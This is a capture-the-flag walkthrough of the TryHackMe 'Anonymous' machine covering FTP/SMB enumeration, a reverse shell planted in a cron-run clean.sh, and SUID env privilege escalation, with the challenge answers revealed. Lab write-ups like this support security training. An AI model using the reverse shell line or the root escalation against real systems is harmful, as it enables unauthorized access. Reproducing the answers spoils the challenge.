Today it is time to solve another challenge called “Anonymous”. It is available at TryHackMe for penetration testing practice. This challenge is of medium difficulty if you have the right basic knowledge and are attentive to little details that are required in the enumeration process. The credit for making this machine goes to Nameless0ne. The breakdown of the Machine with the redacted flags is as follow:

Level: Medium

Penetration Testing Methodology

Network Scanning

• Nmap Scan

Enumeration

• Enumerating FTP Service
• Downloading scripts from FTP
• Investigating Scripts
• Enumerating SMB Shares
• Downloading Image files from Shares

Exploitation

• Uploading Reverse Shell Script on FTP
• Getting User Shell
• Reading User Flag

Privilege Escalation

• Enumerating for SUID bits
• Exploiting SUID on env
• Reading Root Flag

Walkthrough

There are two flags in this machine to discover. After Booting up the target machine from the TryHackMe: Anonymous Page, An IP will be assigned to the machine and will be visible on that page as well.

IP Address: 10.10.3.52

Apart from the two flags, four questions are required as well to complete this machine. You can find the questions as the answers are discovered below.

Network Scanning

To begin, it is required to gain information about the various services running of different ports on the machine. Nmap is used for scanning for those using the -sC and -sV flag. They are used for performing a Default Scripts scan as well as to find the Versions of the services enumerated respectively.

nmap -sC -sV 10.10.3.52

Nmap detected FTP service running on port 21, SSH service on port 22, SMB on port 139 and 445. The Nmap also detected that Anonymous Login is also enabled on the application that makes it accessible right away.

Q.1. Enumerate the machine.  How many ports are open?

4

Q.2. What service is running on port 21?

FTP

Q.3. What service is running on ports 139 and 445?

SMB

Enumeration

Logging into FTP, a scripts directory was found. The scripts directory contained a shell script called clean.sh, A log file by the name of removed_files.log and a text file named to_do.txt. All of these files were downloaded to the Local Kali Linux Machine for further investigation.

ftp 10.10.3.52
ls -la
cd scripts
ls -la
get clean.sh
get removed_files.log
get to_do.txt

The to_do.txt file was a reminder for disabling Anonymous Login. It is not useful from the attacker’s perspective. The removed_files.log file contained logs from the clean-up script indicating that there is nothing to delete.

cat to_do.txt
cat removed_files.log

The clean. sh script is a shell script that seemed to perform log entries and delete files from the /tmp/ directory.

cat clean.sh

With nothing more to enumerate from the FTP service, the enumeration of SMB service was initiated. Smbclient was used to perform an Anonymous login on the Target Machine. It had a share by the name of pics. When accessed, the pics share contained two images: corgo2.jpg and puppos.jpeg. Both of those images were downloaded to the local Kali Machine.

smbclient -L \\anonymous -I 10.10.3.52
smbclient //10.10.3.52/pics
ls
get corgo2.jpg
get puppos.jpeg

Q.4. There’s a share on the user’s computer.  What’s it called?

pics

After opening the image files, it was clear that SMB was supposed to be a rabbit hole. Both images are not important from the attacker’s perspective.

Exploitation

Back to the FTP service, it was detected that it was possible to upload files in the scripts directory. This meant that the attacker can create a clean.sh script with reverse shellcode inside it and then replace it with the one that is currently located on the target machine and then wait for the script to get executed.

nano clean.sh
bash -i >& /dev/tcp/10.10.120.144/1234 0>&1

Before uploading the script, a netcat listener was started on the Local Kali Machine to capture the shell that would be invoked after the clean.sh script gets executed on the target machine. The port number mentioned inside the reverse shell script must be used while invoking the netcat listener. After connecting to the FTP service, the clean.sh script was replaced using the put command.

ftp 10.10.3.52
cd scripts
put clean.sh

The netcat listener captured the reverse shell that was generated due to the execution of the clean.sh script on the target machine. The session generated belonged to the namelessone user on the target machine. After listing the contents of the user’s home directory, the user.txt flag was found.

nc -lvp 1234
ls
cat user.txt

Privilege Escalation

The Post Exploitation Enumeration to find the methods to elevate the privilege on the access started with enumerating the SUID bits. Find command is used for this kind of enumeration. It was observed that /usr/bin/env was assigned to SUID. It meant it can be used to exploit the machine and get elevated access.

find / -perm -u=s 2>/dev/null

            

To get the syntax of the env to be used for elevating privileges, GTFOBINS was used. It was observed that the command that was provided doesn’t elevate privilege directly instead it creates a local SUID copy of the binary and runs it with elevated privileges. When this was combined with the /bin/sh it can provide an elevated shell.

When executed on the namelessone’s shell, a root shell was invoked. This was checked using the whoami command. Finally, to finish the challenge the root flag was read using the cat command.

/usr/bin/env /bin/sh -p
whoami
cat /root/root.txt

Author: Pavandeep Singh is a Technical Writer, Researcher, and Penetration Tester. Can be Contacted on Twitter and LinkedIn